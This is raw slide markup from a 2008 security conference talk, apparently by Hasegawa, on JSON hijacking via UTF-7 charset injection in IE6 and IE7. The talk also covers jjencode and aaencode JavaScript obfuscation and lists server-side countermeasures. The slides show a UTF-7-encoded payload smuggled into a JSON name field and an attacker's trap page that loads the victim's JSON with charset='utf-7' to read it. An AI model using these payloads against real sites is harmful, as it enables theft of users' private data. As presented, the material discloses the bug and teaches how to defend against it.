              <a:t>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"(\\\"\\"+$.__$+$.__$+$.___+$.$$$_+(![]+"")[$._$_]+(![]+"")[$._$_]+$._$+", \\"+$.__$+$.__$+$._$_+$.$_$_+"\\"+$.__$+$.$$_+$.$$_+$.$_$_+"\\"+$.__$+$._$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\\" )"+"\"")())();</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US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5013176"/>
            <a:ext cx="4464496" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCECFF"/>
          </a:solidFill>
          <a:ln w="1905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/>
              <a:t>javascript:alert("Hello, JavaScript")</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" alt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3762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115616" y="3933056"/>
            <a:ext cx="784887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</a:rPr>
              <a:t>jjencode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 - http://utf-8.jp/public/jjencode.html</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400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556792"/>
            <a:ext cx="8424936" cy="3170099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[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"name" : "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>abc+MPv/fwAiAH0AXQA7-var t+AD0AWwB7ACIAIg-:+ACI-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>",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"mail" : "hasegawa@utf-8.jp"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},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"name" : "John Smith",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"mail" : "john@example.com"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}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479715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smtClean="0">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>JSON for target : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0"/>
              <a:t>http://example.com/newmail.json </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="240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835696" y="2526804"/>
            <a:ext cx="604867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364088" y="26369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Injected by attacker</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2400" b="1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3688" y="580526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This means...</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP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556792"/>
            <a:ext cx="8424936" cy="3170099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[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"name" : "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>abc"}];var t=[{"":"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>",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"mail" : "hasegawa@utf-8.jp"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},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"name" : "John Smith",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"mail" : "john@example.com"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}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479715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smtClean="0">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>JSON for target : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0"/>
              <a:t>http://example.com/newmail.json </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="240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835696" y="2526804"/>
            <a:ext cx="187220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67544" y="10527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convert from UTF-7 to another encoding...</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP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067213"/>
            <a:ext cx="8424936" cy="3170099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[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 {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   "name" : "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abc+MPv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/fwAiAH0AXQA7-var t+AD0AWwB7ACIAIg-:+ACI-",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   "mail" : "hasegawa@utf-8.jp"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 },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 {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   "name" : "John Smith",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   "mail" : "john@example.com"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 }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259277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for target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0"/>
              <a:t>http://example.com/newmail.json </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="24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10527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trap HTML page created by attacker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556792"/>
            <a:ext cx="8424936" cy="830997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&lt;script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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="http://example.com/newmail.json" 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charset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="utf-7"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="24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&lt;script&gt; alert( t[ 1 ].name + t[ 1 ].mail ); &lt;/script&gt;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1571636" cy="1571636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1819275" cy="1595437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="下矢印 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="17712398" flipH="1">
            <a:off x="3077631" y="2841150"/>
            <a:ext cx="500066" cy="25850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25144"/>
            <a:ext cx="1100133" cy="1100133"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="テキスト ボックス 40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2987824" y="3717032"/>
            <a:ext cx="2376264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XHR.send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(…)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下矢印 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="6912398" flipH="1">
            <a:off x="2672040" y="3129404"/>
            <a:ext cx="500066" cy="26857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9512" y="5229200"/>
            <a:ext cx="3878172" cy="10001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{</a:t>
            </a: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"from" : "a@example.com" </a:t>
            </a:r>
          </a:p>
          <a:p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}</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="20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25" name="グループ化 86"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2570026" y="4450792"/>
            <a:ext cx="1785950" cy="1714512"/>
            <a:chOff x="5214942" y="928670"/>
            <a:chExt cx="1785950" cy="1714512"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="正方形/長方形 25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直角三角形 26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27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パイ 32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JSON</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" b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251520" y="4221088"/>
            <a:ext cx="2016224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eval</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP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( JSON )</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US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-180528" y="1700808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User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139952" y="5949280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Web mail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022" y="2492896"/>
            <a:ext cx="700618" cy="7200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テキスト ボックス 87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4067944" y="1052736"/>
            <a:ext cx="3096344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&lt;script </a:t>
            </a:r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src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=“</a:t>
            </a:r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json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”&gt;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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="グループ化 14"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7429520" y="1643050"/>
            <a:ext cx="1143008" cy="1143008"/>
            <a:chOff x="7215206" y="1643050"/>
            <a:chExt cx="1714496" cy="1714496"/>
          </a:xfrm>
          <a:effectLst/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5206" y="1643050"/>
              <a:ext cx="1714496" cy="1714496"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="片側の 2 つの角を丸めた四角形 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7622636" y="2050480"/>
              <a:ext cx="285752" cy="214314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chemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
            <a:scene3d>
              <a:camera prst="isometricLeftDown">
                <a:rot lat="2100000" lon="1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片側の 2 つの角を丸めた四角形 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7888292" y="2142592"/>
              <a:ext cx="285752" cy="214314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chemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
            <a:scene3d>
              <a:camera prst="isometricLeftDown">
                <a:rot lat="2100000" lon="1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1819275" cy="1595437"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="下矢印 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="17712398" flipH="1">
            <a:off x="3077631" y="2841150"/>
            <a:ext cx="500066" cy="258507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87824" y="3717032"/>
            <a:ext cx="3096344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&lt;script </a:t>
            </a:r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src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=“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2000" b="1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json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”&gt;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下矢印 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="6912398" flipH="1">
            <a:off x="2672040" y="3129404"/>
            <a:ext cx="500066" cy="26857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9512" y="5229200"/>
            <a:ext cx="3600400" cy="10001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{</a:t>
            </a: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"from" : "</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2000" b="1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+</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0" err="1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MPv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2000" b="1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/…ACI-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 </a:t>
            </a:r>
          </a:p>
          <a:p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}</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" b="1" dirty="0" smtClean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5" name="グループ化 86"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2570026" y="4450792"/>
            <a:ext cx="1785950" cy="1714512"/>
            <a:chOff x="5214942" y="928670"/>
            <a:chExt cx="1785950" cy="1714512"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="正方形/長方形 25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直角三角形 26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27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パイ 32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JSON</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" b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61" name="下矢印 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="4947634" flipH="1">
            <a:off x="4418093" y="-222929"/>
            <a:ext cx="500066" cy="480736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86"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3419872" y="1268760"/>
            <a:ext cx="1785950" cy="1714512"/>
            <a:chOff x="5214942" y="928670"/>
            <a:chExt cx="1785950" cy="1714512"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="正方形/長方形 45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直角三角形 46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>
              <a:stCxn id="47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パイ 52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HTML</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2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365104"/>
            <a:ext cx="1571636" cy="1571636"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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725144"/>
            <a:ext cx="1100133" cy="1100133"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="テキスト ボックス 63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6767736" y="1196752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Attacker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-180528" y="1700808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User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139952" y="5949280"/>
            <a:ext cx="2376264" cy="5000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Web mail</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" b="1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7" name="下矢印 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="15747634" flipH="1">
            <a:off x="4570556" y="220423"/>
            <a:ext cx="500066" cy="480736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8" name="グループ化 86"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5004048" y="2348880"/>
            <a:ext cx="1785950" cy="1714512"/>
            <a:chOff x="5214942" y="928670"/>
            <a:chExt cx="1785950" cy="1714512"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="69" name="正方形/長方形 68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直角三角形 69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2" name="直線コネクタ 71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70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パイ 75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77" name="直線コネクタ 76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テキスト ボックス 82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JSON</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2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84" name="下矢印 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2684819" flipH="1">
            <a:off x="6446208" y="2684710"/>
            <a:ext cx="500066" cy="237591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480720" y="3941036"/>
            <a:ext cx="2663280" cy="7121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80000" rIns="144000" bIns="180000" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:no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From: 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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2000" b="1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+</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0" err="1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MPv</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0" smtClean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…ACI-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" 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022" y="2492896"/>
            <a:ext cx="700618" cy="7200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4" grpId="0" animBg="1"/>
      <p:bldP spid="41" grpId="0" animBg="1"/>
      <p:bldP spid="42" grpId="0" animBg="1"/>
      <p:bldP spid="43" grpId="0" animBg="1"/>
      <p:bldP spid="61" grpId="0" animBg="1"/>
      <p:bldP spid="67" grpId="0" animBg="1"/>
      <p:bldP spid="84" grpId="0" animBg="1"/>
      <p:bldP spid="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2751311"/>
            <a:ext cx="8424936" cy="3785652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Content-Type: application/json; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>charset=utf-8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[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"name" : "abc+MPv/fwAiAH0AXQA7-var t+AD0AWwB7ACIAIg-:+ACI-",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"mail" : "hasegawa@utf-8.jp"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},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{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"name" : "John Smith",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"mail" : "john@example.com"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}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227687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for target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0"/>
              <a:t>http://example.com/newmail.json </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="24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10527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trap HTML page created by attacker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556792"/>
            <a:ext cx="8424936" cy="461665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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script src="http://example.com/newmail.json" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>charset="utf-7"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" smtClean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2" y="3140968"/>
            <a:ext cx="385192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b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charset  in HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" b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response header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="右矢印 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="13285354">
            <a:off x="5008719" y="3172113"/>
            <a:ext cx="720080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7254296">
            <a:off x="7164209" y="1090271"/>
            <a:ext cx="720080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48400" y="692696"/>
            <a:ext cx="206010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b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2852936"/>
            <a:ext cx="7787208" cy="1512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kumimoji="1" lang="en-US" altLang="ja-JP" sz="9600" smtClean="0"/>
              <a:t>DEMO</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="960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Published at Black Hat Japan 2008 and POC2008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3399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Black Hat Japan 2008, POC2008</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>にて</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>発表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r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Affected : IE6 / IE7</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>IE8 : fixed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Reported : Oct 2008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JSON Hijack with UTF-7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Countermeasure by server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003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>サーバ側での対策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pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Escape "+" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>to "\u002b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>" in JSON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3399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>内の </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>を </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\u002b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>にエスケープ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pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Accept only POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>のみ受け入れる</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0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5736" y="4941168"/>
            <a:ext cx="6624736" cy="1015663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{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"name" : "abc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\u002b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MPv/f...QA7-var t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\u002b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AD0A...."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263691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Obfuscated JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>難読化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill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836712"/>
            <a:ext cx="8784976" cy="504753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 /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｀ｍ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´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）ﾉ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~┻━┻   //*´∇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｀*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/ ['_']; o=(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)  =_=3; c=(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=(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)-(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);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=(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)=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o^_^o)/ (o^_^o);(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)={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: '_' ,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: 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 ,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:(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 '_')[o^_^o -(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)] ,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:((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 };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 =((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 [c^_^o];(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c'] = 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)+'_') [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)-(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];(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o'] = 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)+'_') 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)=(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c']+(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o']+(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+'_')[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 + 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+'_') [(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)]+ ((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==3) +'_') [(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c']+((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)+'_') [(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)]+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o']+((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['_'] =(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)=((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.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)+'_') [(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)]+((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 -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+'_')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];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)+=(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);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]='\\';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).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+ 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 -(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)];(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o)=(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+'_')[c^_^o];(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]='\"';(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['_'] (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['_']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((o^_^o)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((o^_^o) +(o^_^o))+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((o^_^o)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(c^_^o)+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])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 ('_');</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="140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5847655"/>
            <a:ext cx="784887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smtClean="0">
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>aaencode - http://utf-8.jp/public/aaencode.html</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="240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25663"/>
            <a:ext cx="3762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23528" y="3301727"/>
            <a:ext cx="4464496" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCECFF"/>
          </a:solidFill>
          <a:ln w="1905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javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" smtClean="0"/>
              <a:t>("Hello, JavaScript")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335699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7544" y="4581128"/>
            <a:ext cx="8208912" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DAE7F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smtClean="0"/>
              <a:t>Content-Type: text/html; charset=utf-8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2800" smtClean="0"/>
              <a:t>Content-Disposition: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attachment</a:t>
            </a:r>
            <a:r>
